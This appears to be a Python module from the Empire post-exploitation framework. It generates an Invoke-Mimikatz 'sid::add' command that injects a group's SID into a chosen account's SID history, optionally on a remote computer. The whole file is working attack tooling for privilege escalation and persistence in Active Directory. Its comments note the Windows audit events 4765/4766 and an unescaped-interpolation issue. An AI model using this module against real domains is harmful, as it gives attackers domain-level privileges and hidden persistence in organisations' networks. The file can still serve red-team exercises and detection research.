add_sid_history.py
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
from empire.server.utils.module_util import handle_error_message
class Module:
    """Empire module wrapper that emits an Invoke-Mimikatz ``sid::add`` call.

    The generated script asks Mimikatz to add the SID of ``Group`` to the
    SID history of the account named by ``User``.

    Detection note: a successful or failed SID-history change is audited by
    Windows as event 4765 / 4766 on domain controllers (when account
    management auditing is on), and appears as a write to the target
    account's ``sIDHistory`` attribute.
    """

    @staticmethod
    def generate(
        main_menu: MainMenu,
        module: EmpireModule,
        params: dict,
        obfuscate: bool = False,
        obfuscation_command: str = "",
    ):
        """Build the final script text for this module.

        Args:
            main_menu: Gives access to ``modulesv2`` for loading and
                finalizing the module source.
            module: Module descriptor; only ``script_path`` is read here.
            params: Operator options. ``User`` and ``Group`` are required
                (a missing key raises ``KeyError``); ``ComputerName`` is
                optional and skipped when empty.
            obfuscate: Passed through to the source loader and finalizer.
            obfuscation_command: Passed through alongside ``obfuscate``.

        Returns:
            The finalized script, or the result of
            ``handle_error_message`` when the source cannot be loaded.
        """
        # Load the shared module source first; stop on any loader error.
        source, load_error = main_menu.modulesv2.get_module_source(
            module_name=module.script_path,
            obfuscate=obfuscate,
            obfuscate_command=obfuscation_command,
        )
        if load_error:
            return handle_error_message(load_error)

        # NOTE(review): option values are interpolated verbatim; a quote
        # character in any of them would change how the command line parses.
        account = params["User"]
        group = params["Group"]
        mimikatz_args = f'"sid::add /sam:{account} /new:{group}"'
        arguments = [f"-Command '{mimikatz_args}'"]

        remote_host = params.get("ComputerName")
        if remote_host:
            arguments.append(f'-ComputerName "{remote_host}"')

        # No encoding happens in this function; the command is appended as
        # plain text and handed to finalize_module as the script tail.
        invocation = "Invoke-Mimikatz " + " ".join(arguments) + ";"
        return main_menu.modulesv2.finalize_module(
            script=source,
            script_end=invocation,
            obfuscate=obfuscate,
            obfuscation_command=obfuscation_command,
        )